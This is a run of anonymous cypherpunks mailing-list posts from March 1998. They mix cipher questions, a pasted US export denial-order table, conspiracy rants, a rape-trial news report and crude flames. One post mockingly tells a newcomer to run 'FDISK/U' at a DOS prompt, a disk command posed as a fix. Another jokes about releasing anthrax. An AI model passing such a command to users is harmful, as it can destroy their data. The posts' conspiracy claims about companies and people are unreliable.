Seems to me that you could always figure out some construct so that no
practically-secure cipher with Skipjack's observable properties could evade
having its key lengthened with much probability. Or maybe not. IANAC.
Besides, it's impossible to make a cipher that can't be used to construct
constructs with bigger key lengths: Skipjack(cryptovariable, IDEA(key,
plaintext)) -- terminology jab intended -- provably has an effective key length
as long as IDEA's. Even if that is cheating...

@_date: 1998-03-02 19:26:28
@_author: Anonymous 
@_subject: Is CDMF secure? 
Is CDMF secure? and,
What sort of algorithm is it?

@_date: 1998-03-04 16:29:36
@_author: Anonymous 
@_subject: ed yourdon on Y2k armaggedon 
What about real bugs introducing themselves into relays? :)
A few years ago a nuke plant wanted to build a computerized control system
and USNRC absolutely gave them hell, requiring them to document every damn
line of it and prove that it could handle all special cases.  But they did
finally approve it.

@_date: 1998-03-05 11:24:11
@_author: Anonymous 
@_subject: No Subject 
In doing a search on the "RELIGIOUS FREEDOM AMENDMENT", Lycos popped over 2000 hits.  In checking out several sites, this one seemed the most rational in discussing the issue.

@_date: 1998-03-10 18:40:53
@_author: Anonymous 
@_subject: CypherPunks -- The Early Years 
Close examination of fossil mosquitoes from 40 million
years ago show they look just about the same as that one
dining on your arm.
LMBoyd Web Site / U. S. Newspapers / Start Email / Stop Email

@_date: 1998-03-10 20:42:56
@_author: Anonymous 
@_subject: Dr. Dimentos Tentacles 
Bill Frantz is *really* Vulis.
  Bill Stewart is *really* Toto.
  Both are charter members, along with Bill Clinton and Bill Gates,
of a secret society of people named Bill who plan to form a new
world government and declare the Buffalo Bills to be the real
Superbowl Champions by an act of legislation.
  I am truly amazed that a seemingly intelligent group of individuals
such as the CypherPunks cannot see the blatantly obvious connections
between the Bills and the TMs who are warring for control of our
Eric Michael Cordian 0+
O:.T:.O:.T:. Mathematical Munitions Division
"Forge What Thou Wilt Shall Be The Whole Of The Law"

@_date: 1998-03-11 15:24:19
@_author: Anonymous 
@_subject: Only In Anonymous... 
I've long said the same thing about the purported 'news' stories
carried by the mainstream press, but the replies I have received from
the news giants merely state that their office gang all had a good
laugh over my 'satire'.
  Until the mainstream press begins marking their articles with such
labels/disclaimers as 'half-truth'/'politically-biased'/'government-
handout'/'self-serving'/'total-bullshit', etc., then I see no reason
to require such labeling by individual netizens who may well be doing
nothing more than writing the news of the near-future.
You go cut wood, carry water--chop, chop, splash, splash...

@_date: 1998-03-12 22:03:15
@_author: Anonymous 
@_subject: Fortify 
Tthe remarkably hackable nature of  Netscape's "weak" crypto has been marveled
at here and in the press, but has no one else speculated on how this state of
affairs came to be?  I, for one, would like to thank the anonymous cypherpunks
toiling in the bowels of Netscape.  An amazing feat, achieving world-wide
distribution of millions of copies of strong crypto, the Feds all unknowing.  Does anyone here _not_ think this was the deliberate act of one or more

@_date: 1998-03-14 19:39:34
@_author: Anonymous 
@_subject: (no subject) 
Sometime ago there was a post to the list which made more sense than
all of the other finger-pointing posts, combined, which have proclaimed
this-or-that entity to be a tentacle/testicle of one or another of the
list members.
The post was by someone claiming to be the "only" real member of the
cypherpunks list. It told how he had, being a lonely loser whom no one
would communicate with, started the cypherpunks mailing list and posted
to it under several personas, hoping to generate interest and have other
people join the list. It seems that his efforts began to escalate and
take on a life of their own, and he eventually had developed all of the
personas that currently existed on the list, and that no one else had
ever actually joined the list, at all.
"In reality, we talk only to ourselves, but sometimes we talk loud
 enough that others may hear us."
        Kahil Gibran, The Prophet

@_date: 1998-03-14 19:58:16
@_author: Anonymous 
@_subject: In Your EAR... 
Full list at:                            U.S. DEPARTMENT OF COMMERCE
                         BUREAU OF EXPORT ADMINISTRATION
                   Table of Denial Orders Currently in Effect
                           (Revised March 6, 1998) TABLE OF DENIAL ORDERS CURRENTLY IN EFFECT
(a) Contents
This table lists orders that currently deny export privileges in
whole or in part.  Orders are published in full in the Federal Register
cited in the column entitled, "Federal Register Citation."
(2) Publication of orders.  New or amended denial orders are published
in the
Federal Register as they are issued, and their issuance announced in
Administration Bulletins.  Although  diligent efforts have been made to
the accuracy of the information in this table, the Federal Register is
authoritative source for denial orders.  (3) Table: This table is updated as new orders are promulgated and
orders expire.  The table does not appear in the Code of Federal
Regulations. Paper copies of this table are available from:
Office of Export Services
P.O. Box 273
Washington, D.C. 20044
(b) Effect of Denial Orders
Section 787.12 of the Export Administration Regulations (15 CFR 787.12)
it unlawful, without prior specific authorization from Export
for any person to:
(1) Apply for, obtain, or use any license, Shipper's Export Declaration,
of lading, or other export control document relating to an export or
of commodities or technical data by, to, or for another person then
subject to
an order revoking or denying his export privileges or then excluded from
practice before the Bureau of Export Administration, or
(2) Order, buy, receive, use, sell, deliver, store, dispose of,
forward, transport, finance, or otherwise service or participate;
(i) in any transaction which may involve any commodity or
technical data exported or to be exported from the United States.
(ii) in any reexport thereof, or
(iii) in any other transaction which is subject to the Export
Administration Regulations, if the person denied export privileges may
obtain any benefit from or have any interest in, directly or indirectly,
any of these transactions.
(3) A denial order applies not only to the persons or
firms named in the order, but may also, after notice and opportunity for
comment, be made applicable to other persons with whom the respondent(s)
may then or thereafter be related by ownership, control, position of
responsibility, affiliation, or other connection in the conduct of trade
or related services. (See Section 788.3(b) of the Export Administration
Regulations (15 CRF 788.3(b))).
(4)  Some denial orders have different restrictions than those noted
Summaries of the export privileges that each order denies are printed in
the column headed "Export Privileges Affected".  The exact scope of the
denial is set forth in the applicable Federal Register Notice(s).
If you have questions about the scope of a particular denial order, you
contact the Office of Enforcement Support, U.S. Department of Commerce,
4065, 14th Street and Constitution Ave., N.W., Washington, D.C. 20230, Telephone (202) 482 4255, Fax (202) 482-0971.
                                                                 Federal
Name and Address   Effective   Expiration    Export Privileges                       Date         Date          Affected        Abelairas,          6/5/95      6/5/05        General           60 F.R.
Amancio J.                                    and
validated                   a.k.a. Gonzalez,                              licenses, all Jesus                                         commodities,
6486 S.W. 9th                                 any destination,
Miami, Florida                                also exports
33144                                         to Canada
and d.b.a
Estrella Del Caribe Import and Export Inc.,
5529 S.W. 9th Street
Miami, Florida Ace, Ian            8/8/97     8/8/17        Standard         62 F.R.
43503    8/14/97   with addresses at
4 Mimosa Way
South Africa
A. Rosenthal (PTY) Ltd.
P.O. Box 3721
13 Loop Street
Cape Town
South Africa
  and
A. Rosenthal (PTY) Ltd.
P.O. Box 44198
65 7th Street
Denmyr Building
2104 Linden
South Africa
ADT Analog and       9/10/81    Indefinite   General            46 F.R.
 Digital Technik,                            and validated        8019 Niederseeon,                            licenses, all       46 F.R.
 House 21,                                   commodities,         Federal Republic                             any destination,
 of Germany                                  also exports
                                             to Canada.
                                             See: Bruchausen,
                                                  Werner J.
Aeriotechnics         4/11/83  5/31/01       General            47 F.R.
 (Pte) Ltd.                                  and validated         and Claypro                                 licenses, all      48 F.R.
 (Pte) Ltd.                                  commodities,         Suite 606,                                   any destination,
 6th Floor                                   also exports
Colombo Court                                to Canada.
and 4E                                       See: Kwik, Richard
 Dayson Road
Agnese, Andree         7/11/85 Indefinite    General            50 F.R.
22 Rue du                                    and validated         11 November 1918                            licenses, all
Pantin                                       commodities,
France                                       any destination,
                                             also exports
                                             to Canada.
                                             See: Agnese,
                                                  Rodolphe
Agnese, Helene        7/11/85  Indefinite    General            50 F.R.
37 Rue de                                    and validated         la Quintinie                                licenses, all
Paris 75015                                  commodities,
France                                       any destination,
                                             also exports
                                             to Canada.
                                             See: Agnese,
                                                  Rodolphe
Agnese, Rodolphe      3/15/90  3/15/00       General            55 F.R.
 individually and                            and validated         d/b/a Development                           licenses, all
 Engineering                                 commodities,
 and Electronics                             any destination,
37 Rue de                                    also exports
 la Quintinie                                to Canada.
75010 Paris
Agnese, Saba          7/11/85  Indefinite    General            50 F.R.
 a/k/a Saba Ambaye                           and validated        37 Rue de                                    licenses, all
 la Quintinie                                commodities,
Paris 75015                                  any destination,
France                                       also exports
                                             to Canada.
                                             See: Agnese,
                                                  Rodolphe
Alex Goh              9/10/93  9/10/13       See: Goh,          58 F.R.
                                                  Sian Lake       Ali Reza              11/9/93  7/26/99       General            58 F.R.
 Foyuzi Yousefi                              and validated        P.O. Box 1341                                licenses, all
 and                                         commodities,
38 Firouzkh                                  any destination,
Tajresh,                                     also exports
Tehran, Iran                                 to Canada.
Alkadi, Essam         2/20/98   2/20/01      Standard            63 F.R.
P.O. Box 201                                                       Dammam 31411
Saudi Arabia
Al-Kadi. Essam       2/20/98   2/20/01       Standard            63 F.R.
10188 P.O. Box 201                                                        Dammam 31411
Saudi Arabia
Almori, Robert        10/8/87  Indefinite    General            52 F.R.
80-82 Rue                                    and validated         Saint Dominique                             licenses, all
Paris 7, France                              commodities,
                                             any destination,
                                             also exports
                                             to Canada.
Ambaye, Saba          7/11/85  Indefinite    General            50 F.R.
a/k/a Saba Agnese                            and validated        37 Rue de                                    licenses, all
 la Quintinie                                commodities,
Paris 75015,                                 any destination,
 France                                      also exports
                                             to Canada.
                                             See: Agnese,
                                                  Rodolphe
American              4/23/90  4/23/05       See: Tai,          55 F.R.
Semiconductor,                                    Philip T.J.     Los Gatos,
American              6/26/95  6/26/05       General            60 F.R.
Technology Trading                           and validated         Group                                        licenses, all
44 Montgomery St.                            commodities,
Suite 500                                    any destination,
San Francisco,                               also exports
California  94104                            to Canada.   Amiri, Reza           9/25/93  9/25/13       General            56 F.R.
Panjtan                                      and validated      11/20/91
a/k/a                                        licenses, all      57 F.R.
 Amiri, Ray                                  commodities,       5/18/92
individually                                 any destination,   57 F.R.
 with an address                             also exports       6/8/92
 at:                                         to Canada.         57 F.R.
13165                                                           12/3/92
 E. Essex Dr.                                                   58 F.R.
Cerritos,                                                       6/2/93
 California                                                     58 F.R.
and d/b/a                                                       10/4/93
Ray Amiri                                                       60 F.R.
Computer                                                        2/13/95     now a/k/a CCC Inc.
with addresses at:
 9-11
D-6000 Frankfurt 1,
 Germany
c/o Pars Hafezeh
Mirdamad Avenue,
Mohsseni Square,
Farnaz Street
Tehran, Iran
Annexfield, Ltd.      12/14/84 Indefinite    General            49 F.R.
152 Budbrooke Rd.                            and validated        Warwick,                                     licenses, all
 United Kingdom                              commodities,
                                             any destination,
                                             also exports to
                                             Canada
                                             See: O'Hara,
                                                  Daniel J.
Appelberg             6/19/89  6/19/04       See: Appelberg,    54 F.R.
 Financial                                        Lennart          Services
 Sweden
Appelberg,            6/19/89  6/19/04       General            54 F.R.
 Lennart (Lennert)                           and validated         individually                                licenses, all
 and d/b/a                                   commodities,
Appelberg                                    any destination,
 Financial                                   also exports
 Services                                    to Canada.
 Manssonsvag 1,
 Saltajobaden, Sweden
Applied Systems       12/14/84  Indefinite   General            49 F.R.
 Methods                                     and validated        and Technology                               licenses, all
 (ASMAT)                                     commodities,
Rochford, Essex                              any destination,
United Kingdom                               also exports
                                             to Canada.
                                             See: O'Hara,
                                                  Daniel J.
ATC Lab               12/5/89  12/5/99       See: Schmidt,      54 F.R.
 Electronic                                       A.S.S.           Service,
Segelflygsgatan 35,
122 52 Enskede,
 Sweden
Attia, Ben H.          10/30/97  10/30/12    Standard                        aka Attia, Adnan
1614 Nine Island Boulevard
Miami Beach, FL 33134
  dba General Polyphase, Inc.
15 rue de Kamel Attaturk
1001 Tunis, Tunisia
Avomair Ltd.          12/14/84 Indefinite    General            49 F.R.
a/k/a                                        and validated         Microcircuit                                licenses, all
 Technology                                  commodities,
3 Featherby Way                              any destination,
Purdey's                                     also exports
 Industrial                                  to Canada.
 Estate                                      See: O'Hara,
Rochford,                                         Daniel J.
 Essex,
 United Kingdom
Barbarits, Bruno      5/3/88   5/3/08        General            53 F.R.
 individually                                and validated         and d/b/a                                   licenses, all
Cosmotrans AG                                commodities,
 a/k/a                                       any destination,
 Cosmotrans Ltd.                             also exports
P.O. Box 30978                               to Canada
Fracht West                                  See: Wirth, Hans
 Building
Office 274
 CH 8058
 Switzerland
 and
 USA, Inc.
JFK International
 Airport
Jamaica, New York
Behrmann,             1/23/92  5/10/00       General            57 F.R.
 Symone Morris                               and validated        11 Goldfinch Ct.,                            licenses, all
                                         commodities,
Toronto, Canada                              any destination,
                                             also exports
                                             to Canada.
Belgium               3/5/91   3/5/01        See: Sanders,      56 F.R.
 Trading                                          Marcel           Company
Lokeren S.A.
Sijpstratt 6 9101
Lokeren, Belgium
Berg, H. Leonard      5/12/94  1/29/02       General            59 F.R.
750 Kappock Street                           and validated        Apartment 103                                licenses, all
Bronx, New York                              commodities,
 and                                         any destination,
at the time the                              also exports order was issued                             to Canada
incarcerated at:
U.S. Bureau
 of Prisons
Low Security
 Correctional
 Institution-Allenwood
White Deer, Pennsylvania
Beta Computer        6/13/95   6/13/05      General             60 F.R.
Trading Pte.                                and validated         Limited                                     licenses, all
One Rockor Canal                            commodities,
Road                                        any destination,
Sim Lin Square                              also exports
# 06-67                                     to Canada
Singapore, 0718                             (See Waldemar,
                                            Znamierowski
                                            and
                                            Prandecki, Paul     Bin Wu                9/7/93   9/7/03       See: Wu, Bin       59 F.R.
Virginia Beach,                                                    Virginia
Bose, Sidhartha       6/16/95 6/16/05        General           60 F.R.
32940 a/k/a/ Dr. Bose                              and validated        individually and                             licenses, all
d.b.a.                                       commodities,
Perfect Technologies,                        any destination,
LTD.                                         also exports 212 Golders                                  to Canada   Green Road
London, NW11 9BY
individually and W.K. Agencies
and as
Computer Focus
Services PTE. LTD.
with an address at
18 Jalan Kechil, Eastern Mansion
Singapore 1543
Bose, Dr.               6/16/95  6/16/05     See Bose, Sidhartha  60
F.R. 32940
Brandstetter, Herbert 6/15/87  6/15/07       General            52 F.R.
 c/o Scan Trade                              and validated         Handelsgesellschaft                         licenses, all
 m.b.H.                                      commodities,
Wiednerhauptstrasse 135                      any destination,
A-1050 Vienna,                               also exports
 Austria                                     to Canada.
Brero, Mario          6/26/95  6/26/00       General            60 F.R.
Apt. 87                                      and validated         7/3/95 Route de Bougy 1170                          licenses, all
Aubonne, Vaud                                commodities,
Switzerland                                  any destination,
                                             also exports
                                             to Canada.
Brownhill, David      9/11/95  10/6/03       General            60 F.R.
13 Robin Road                                and validated        Northcliff Ext. 12                           licenses, all
Johannesburg, South Africa                   commodities,
                                             any destination,
                                             also exports
                                             to Canada.
Bruchhausen,          3/24/81  Indefinite    General            46 F.R.
 Werner J.                                   and validated        D8019 Niederseeon                            licenses, all
Federal Republic                             commodities,
 of Germany                                  any destination,
                                             also exports
                                             to Canada.
Burger, Peter         3/25/93  3/25/13       General            58 F.R.
 individually  and                           and validated         as agent for                                licenses, all
Helling KG                                   commodities,
54 Sylvesteralle                             any destination,
 22000                                       also exports
Hamburg 54,                                  to Canada.
 Germany
 and
Int'l. Business
 Connections
11 rue Aldringen
1-2960 Luxembourg,
 Luxembourg
Butcher, Brian A.     3/21/86  3/21/06       General            51 F.R.
a/k/a                                        and validated        Brian A.                                     licenses, all
 Moller-Butcher                              commodities,
 c/o Contel Equipment                        any destination,
5 Bear Court                                 also exports
Danshill East                                to Canada.
 Industrial Estate                           See: M.E.S.
Basingstroke,                                    Equipment, Inc.
 Hampshire
Caesar                12/19/90 12/19/05      General            55 F.R.
 Electronics, Inc.                           and validated        40C, Corbin Avenue                           licenses, all
Bayshore, New York                           commodities,
                                             any destination,
                                             also exports
                                             to Canada
CAE Services          5/29/91  5/29/11       General            56 F.R.
Lowengasse 2A                                and validated        A-1030 Vienna,                               licenses, all
 Austria                                     commodities,
                                             any destination,
                                             also exports
                                             to Canada.
                                             See: Kovar,
                                                  Alexander
Callaghan,            1/23/92  7/20/00       General            57 F.R.
 Maryanne E.                                 and validated        39 Congress St.                              licenses, all
Warwick, Rhode Island                        commodities,
                                             any destination,
                                             also exports
                                             to Canada.
Carlson, Paul C.      3/5/85   3/5/00        General            50 F.R.
P.O. Box 3125                                and validated        Brockton,                                    licenses, all      50 F.R.
 Massachusetts                               commodities,          and                                         any destination,
87 Springhill Avenue                         also exports
Bridgewater,                                 to Canada.
 Massachusetts                               See: Contel
                                                  Equipment
CCC Inc.              9/25/93  9/25/13       See: Amiri, Reza   57 F.R.
Frankfurt, Germany                                               12/3/92 and
 c/o Pars                                                       58 F.R.
 Hafezeh                                                          6/2/93 and
Tehran, Iran                                                    58 F.R.
10/4/93 and
                                                                60 F.R.
Chan, Anthony         12/6/84  Indefinite    General            49 F.R.
a/k/a                                        and validated        Chan Sum-Tai Anthony                         licenses, all
c/o Shuttle                                  commodities,
 Long Co., Ltd.                              any destination,
Ka Wah Bank                                  also exports
 Center Building                             to Canada.
19th Floor                                   See: Wysh Data
232 Des Voeux Road                                Systems, Ltd.
Hong Kong Central
Chan Sum-Tai Anthony  12/6/84  Indefinite    See: Wysh Data     49 F.R.
a/k/a                                             Systems, Ltd.    Anthony Chan
 c/o Shuttle
 Long Co. Ltd.
Ka Wah Bank
 Center Building
19th Floor
235 Des Voeux Road
Hong Kong Central
Chemco                8/7/89   8/26/98       See: Walaschek,    54 F.R.
Seigburger                                        Peter;           Strasse 223                                      Colimex;      54 F.R.
5000 Cologne 21,                                  Far-Trade      8/14/89
Federal Republic                                  Pharma-       56 F.R.
 of Germany                                       Vertrieb                                                          GmbH
Chua Tok Peng         9/10/93  9/10/13       See: Tok Peng      58 F.R.
                                                  Chua

@_date: 1998-03-14 23:33:44
@_author: Anonymous 
@_subject: get me off/ME TOO! 
Dumbass, if you didn't have the brain cells to understand what this list is about, don't play with your mommy's computer and e-mail account.  Open a dos prompt and type "FDISK/U" and all your troubles will be over.  (what a fucked up band name)

@_date: 1998-03-15 00:23:29
@_author: Anonymous 
@_subject: New Website is up!! 
Considering the one-line content of the Web page, this appears
to have been a troll, perhaps aimed at gathering an instant
snapshot database of IP addresses/domains/reverse lookups of
people with an interest in crypto.
Don't go there. 'Scuse me, someone's knocking at my door...
NO CARRIER
----- Original Message -----
Date sent:        	Sat, 14 Mar 1998 10:17:45 -0700
Copies to:        cypherpunks-announce at toad.com
Send reply to:    "Jared" New Web page up at HTTP://WWW.INSTANTWEB.COM/~SALEM/
CHECK IT OUT!!    -CypherPunks Get your FREE, private e-mail
account at

@_date: 1998-03-15 01:44:11
@_author: Anonymous 
@_subject: Killing Stan the Right Way 
That's right. After glancing through some of the early posts to the
cypherpunks list one realizes that many of them had to walk ten miles
to get to a computer--always uphill and often in a blinding snowstorm.
That was back in the days when Americans still knew how to make a
big, high-powered car, but cypherpunks didn't use them to get to
their computers because they weren't namby-pamby momma's boys like
those godless commie A(h)OLs who get their peckers hammered on the
cypherpunks list and then complain because they can't get off.
Has anyone seen my shoes? I can't find my shoes...

@_date: 1998-03-15 11:53:26
@_author: Anonymous 
@_subject: time to export RSA and demand to be prosecuted? (Re:Cypherpunks Crypto_Legal Assistance Fund) (fwd) 
Decoded the message from your post and will tell our friends in Las Vegas to release the _real_ anthrax as soon as possible.
It looks like the feds are going to hang the Olympic Park bombing
on rudolph, so it seems you have nothing to worry about.
A. Nanny Mass
p.s. - I agree with the point of your post, although I didn't really
    understand it.

@_date: 1998-03-16 20:47:29
@_author: Anonymous 
@_subject: Prologue 8/0 
SAHMD -- Prologue 8/0 All indications are that this chapter was written by, or under the
direction of, Larry Joe Dowling, the Austin attorney who flew to
Las Vegas to warn old Doc Parker that his autobiography had been
set in motion by government entities which were working against
his self-interests.
Only Dowling would have likely been familiar with the persona known
as Justin Case, a musician that Parker met only one time, at a late-
night picking/drinking session at Dowling's residence outside of Austin.
Only Dowling would have been likely to recognize the close affinity
between "The Electronic Privacy Papers" and "Paper Prison."
Prologue 4/0
Analysis of past communications between toto at sk.sympatico.ca and
camcc at abraxis.com indicate that this chapter was written by Alec
McCrackin, a Circle of Eunuchs member purportedly working as a
CoE double agent, deep within the bowels (this week's 'catch phrase')
of the BXA in Georgia, but actually a triple-agent working to expose
the source and goals of the 'True Story of the InterNet' manuscripts,
as well as a quadruple-agent working for MI9 and pulling down some
serious money collecting all of those paychecks...
Prologue 5/0
Written by Bianca, a CoE member renowned far and wide for a pair of
stand-up titties that men would abandon thrones and fortunes for.
"The Story Thus Far:
  (Or so we would have you believe...)" is a classical trademark of
the woman who has 'monitored the monitors' since her initiation into
the Circle of Eunuchs, and who has provided much of the insider
information that is openly disseminated in 'The True Story of the
InterNet" manuscripts, surrounded by details which seem outlandish
and overblown to those who have never experienced the true depth of
the mystery and intrigue taking place behind the scenes of what the
average person views as reality.
Prologue 6/0
This chapter was ghost-written by a resident of the Home For The Criminally Insane, who transcribed the barkings of the Author's
dog, Baby (aka - MongrelMonger), who claims to be a Fox Terrorist.
Baby is purported to be the inspiration behind the soon-to-be
worldwide phenomena known as the Army of Dog.
Prologue 7/0
Written by Kent Crispin, a CypherPunk who was torn between his work
as a Government Schill (TM) and his obligations as a full initiate of
the Circle of Eunuchs, until he received a private email from the Author, stating that Kent was welcome to 'rat me out' at any given
point in time in order to protect his family, with the explaination
from the Author that, 'I am expendable--that's my role in the CoE.'
Prologue 8/0
This chapter was not written by me...it is an obvious forgery...

@_date: 1998-03-16 21:08:32
@_author: Anonymous 
@_subject: If Tim May fucked John Young, the progeny would write... 
Excretion from Prologue 7/0 of Space Aliens Hide My Drugs:
  The only hope for Netizens to resist becoming Digital Sheeple behind the ElectroMagnetic Curtain which the forces of censorship/repression
are striving to put in place is for each member of the coming Army
of Dog to mark their meatspace and cyberspace territory and refuse
to go gently into the night when the Oppressor attempts to scare
them into submission with a mountain of laws and regulations which
promise unjust persecution for imaginary offenses.
  A Global InterNet Army of individuals committed to freedom must
strive to create a maximum entropy within which the chaos of semiotic
evolution can break the digital chains which the Statist Oppressors
are seeking to use to bind and repress access to information, global
communication, free speech/expression, and the evolution of the
Universal Life Energy, itself.

@_date: 1998-03-17 06:12:12
@_author: Anonymous 
@_subject: No Subject 
A note to Cypherpunks:
Today I was sent a missive ostensibly from Mr. Toto.
Following are the particulars:
[begin quote]
Return-Path: Received: from harrier.sasknet.sk.ca (harrier.sasknet.sk.ca [142.165.5.2]) by camel10.abraxis.com (8.8.5/8.8.5) with ESMTP id XAA02654 for ; Mon, 16 Mar 1998 23:42:42 -0500 Received: from uymfdlvk (regnsk01d05020132.sk.sympatico.ca [142.165.24.84]) by harrier.sasknet.sk.ca (8.8.6/8.8.6) with SMTP id WAA21157;
Mon, 16 Mar 1998 22:40:54 -0600 (CST)
Reply-To: toto at sk.sympatico.ca
[end quote]
For health reasons I removed myself from the list several months ago; now it appears the errors of my youth have returned to haunt I had assumed either the RCMP, CIA, FBI, KGB, ASPCA, or some other local authority had plucked Toto from the Web.
Alas, this latest message, SAHMD -- Prologue 8/0, indicates the torment continues unless, of course, it is a forgery. But then, Mr. T. has been known to forge messages he has signed and send them direct with screwed up Anon: headers.
This must stop. Whom should I contact to complain about such My head is hurting again for the first time in months.

@_date: 1998-03-17 13:13:12
@_author: Anonymous 
@_subject: PGP assimilated by NAI 
Back in the 'old days', when I had to walk ten miles, uphill,
in a blinding snowstorm, only to find that computers did not
exist yet, I was a founder of one of the first Canadian anti-nuclear grassroots organizations.
  Once the anti-nuke movement had progressed to the point  where it was a viable entity, worthy of press coverage,
etc., the Canadian government began to 'recognize' the
legitimacy of the movement, and to 'fund' it (hee-hee).
  I went to the self-congratulatory celebration party held
by the members of the group I had founded who had managed
to line up at the government trough by abandoning their
ethics and values in favor of a government-mandated policy
of taking a 'reasonable' middle-road in the group's activities.
  I was there for eleven minutes. I spent the first five minutes
shoveling as much free food as humanly possible down my throat.
I spent the next five minutes draining every bottle of free
liquor in sight down my throat. I spent the next minute barfing
everything I had consumed all over the government representative
who was in attendance to make certain that everyone was toeing
the line and not saying 'bad things' about the Canadian government
or the Nuclear Power Industry.
Prologic Management Systems, Inc., bought Basis, Inc., in Berzerkeley
a couple years ago (considered by some to be the main lair of a secret organization dedicated to preventing the Evil One from using
computer technology to imprison the minds and souls of humankind).
My research indicated that Prologic was a spook-owned 'company killer'
which specialized in buying out and decimating companies who actually
had a capacity to resist the diabolical aims of the NWO.
When Network Associates bought PGP, I did similar research on NAI
and Network General, and came to the same conclusions.
  I have a friend in Arizona who asks me for investment advice, and
I recently told him to invest heavily in companies being acquired
by WorldComm.
  My rationalization for his investing heavily in companies in league
with the Anti-Christ was that, when Jesus comes back, he'll have enough money to buy him a meal and drinks at the best restaurant in
town, thus redeeming himself.
Whenever the government 'legitimatizes' any organization/product, it
is generally for the purpose of co-opting/fucking them.
The government uses the carrot-stick method on the citizen-animal.
First, it gives them the carrot/benefit for registering their identity
with the government (SSN and then it gives them the stick/buttfucking
once they are identified and categorized.

@_date: 1998-03-17 19:27:09
@_author: Anonymous 
@_subject: The Eighth Word You Can't Say On The Internet 
Armies Gather by Jeff Elliott The most surprising place where anti-abortion provisions have appeared,
                   was in the mammoth Telecommunications Deregulation
Bill. Late in the day of January 30th,
                   Colorado Representative Pat Schroeder made an
unpleasant discovery: a last-minute addition
                   appeared to make it a crime to discuss abortion on
the Internet.                    The Telcom Bill already had the controversial
"Communications Decency Act" that made it a felony
                   to mention the seven dirty words forbidden on radio
or TV; that was well known, and much
                   discussed in both the House and the Senate. But this
abortion clause was new, and would make
                   "abortion" the eighth word banned from cyberspace.                    The ACLU and 19 other organizations filed for a
temporary restraining order on the same day that
                   Clinton signed the bill. But while the federal judge
ruled, the vague "indecency" provisions were
                   probably unconstitutional and should be heard by a
special 3-judge panel, the restraining order on
                   the abortion section was denied.                    Schroeder and others are trying to repeal the ancient
law behind these restrictions, but passage in the
                   rightward-tilted House is far from certain.

@_date: 1998-03-18 07:59:11
@_author: Anonymous 
@_subject: You've got to save room for desert... 
Takes 18 bee hummingbirds to weigh as much as a shot of
LMBoyd Web Site / U. S. Newspapers / Start Email / Stop Email

@_date: 1998-03-18 10:06:44
@_author: Anonymous 
@_subject: The Rapist from the Internet Chat Room 
Alleged `Cybersex' Victim Testifies    By SAMUEL MAULL, Associated Press Writer
NEW YORK -- A woman who says a graduate student she met online tied her up
and raped her in his apartment tearfully described for jurors how she
begged, "Don't rape me, don't dismember me, don't kill me" before escaping.
   In emotional testimony Tuesday, the 22 -year-old woman said she managed
to untie herself from a futon, fight off her assailant and flee.
   "I was sore.  I was exhausted.  I didn't want to move," she said, then
describing how she loosed the cloth strips:  "I felt so good!  I got it
undone and I stood up!  I got it undone!  I looked at him and he looked
frightened!  I'm not going to die!"
   The witness, who said she was naked while tied up, said she grabbed her
clothes and got dressed while running for the door and fighting off the man
who had held her as a sex captive for more than 20 hours.
   "He tried to catch me," she said.  "I just kept fighting.  I wouldn't
let him get any part of me.  I ran to the door and clenched the handle
because I was not going to be tied up again."
   The woman says her tormentor was Oliver Jovanovic, 31, a Columbia
University doctoral candidate in molecular biology whom she met in an
Internet chat room.
   Jovanovic is charged with kidnapping, sodomy, aggravated sex abuse and
assault against the woman in his apartment following their first date Nov.
22, 1996.
   The woman said Jovanovic had tied her up, dripped hot candle wax on her
abdomen and genital area, bit her breasts until they bled and used a
nightstick to sexually abuse her.
   The woman said Jovanovic attacked her after a discussion about good and
evil and became upset when she said she believes people are not inherently
evil.  He then ordered her to undress, she said.
   Defense lawyer Jack Litman said no violence occurred between the two and
that any sexual activity, while it might have been unusual, was consensual.
   He quoted from e-mail messages sent by the woman to Jovanovic before and
after their date in which she talks about sadomasochism in what appear to
be terms of approval.
   The e-mail messages the woman sent to Jovanovic included one that reads
"Rough is good," and another that reads "I would go through the pleasure of
hell's pain."
   The woman testified that she sought out Jovanovic because she thought he
was intelligent, knowledgeable and interesting.
   Litman called the woman unstable and overly imaginative.  He said she is
blaming the evening's activity on Jovanovic to absolve herself of something
she likes but considers dirty.

@_date: 1998-03-18 16:18:30
@_author: Anonymous 
@_subject: PRZ 'corrections' 
> > I'm just curious, and no offense intended, but Phil's signature is
I'm getting mighty tired of the anonymous motherfuckers posting through
efga.org interfering with the attempts of the anonymous saints posting
through the other anonymous remailers to spread CSM (Cluelessness,
Stupidity and Misinformation) throughout the Internet.
"If you're not living in space, you're taking up too much of the edge."
~ No Beer

@_date: 1998-03-18 20:55:30
@_author: Anonymous 
@_subject: MISTY1 and MISTY2 
MISTY1 and MISTY2 operate with 64-bitplain text
and cypher text blocks and is contolled by
a 128-bit key.
These two encryption algorithms call MISTY

@_date: 1998-03-19 18:38:41
@_author: Anonymous 
@_subject: Make 6 Figure Income Working In Your Pajamas !! 
I had a girlfriend who used to do that...does that make me a pimp?

@_date: 1998-03-20 12:28:39
@_author: Anonymous 
@_subject: Chicken "anons" and "nobody's" 
Stan, whose mind is held hostage by the heathens at A(h)OL, has not
yet been visited by the revemissionlutionaries of the Army of Dog,
and thus does not realize that the ClueServer died for his sins.
Thus, his body and soul are destined to boil in a big black pot
forged from the melted remains of his own kettles, and fired by
the burning ears of those he has maligned behind their backs, as
are all those who spread FUD out of cluelessness, instead of out
of a genuine desire to be a rabble-rousing shit-disturber.

@_date: 1998-03-20 20:57:29
@_author: Anonymous 
@_subject: Faked mail from canada? (was : Clarification / Re: UPSs 
Yes I do...
                                  |
        Watch For CypherPunks     |
                                  |
         Next Ten Posts           |
                                  |
                                  |

@_date: 1998-03-20 22:19:40
@_author: Anonymous 
@_subject: Micro$not Ba$hing 
At the risk of having list members speculating that this anonymous
post is being sent by Toto/TruthMonger in order to gloat his dropping
Pearls of Wisdom upon those with weak connections to the ClueServer,
I would like to compliment Eric Tune on his recognition of my...Uhhhh,
I mean *TruthMonger*'s sense of Reality.
 > The ONLY significant in-roads that anyone has made with a Unix
I *love* UNIX/Linux, but I have no illusions that they comprise a
viable option for John and Jane Q., unless they are provided at a
reasonable price, with GUI's that are usable by people who desire
to be able to use a computer without becoming a dweeb/guru/expert.
This is exactly what the Anti-Micro$not Coalition is attempting. Instead
of making their software available to M.E. Tarzan and U. Jane at a
competitive price, they are attempting to prevent someone who sought
and got (Hey! I'm a poet...) their business from offering them even
more affordable software extensions to their basic operating system.
If providing the end-user with the tools to use their modem and the
InterNet is an anit-trust violation, then shouldn't the same concept
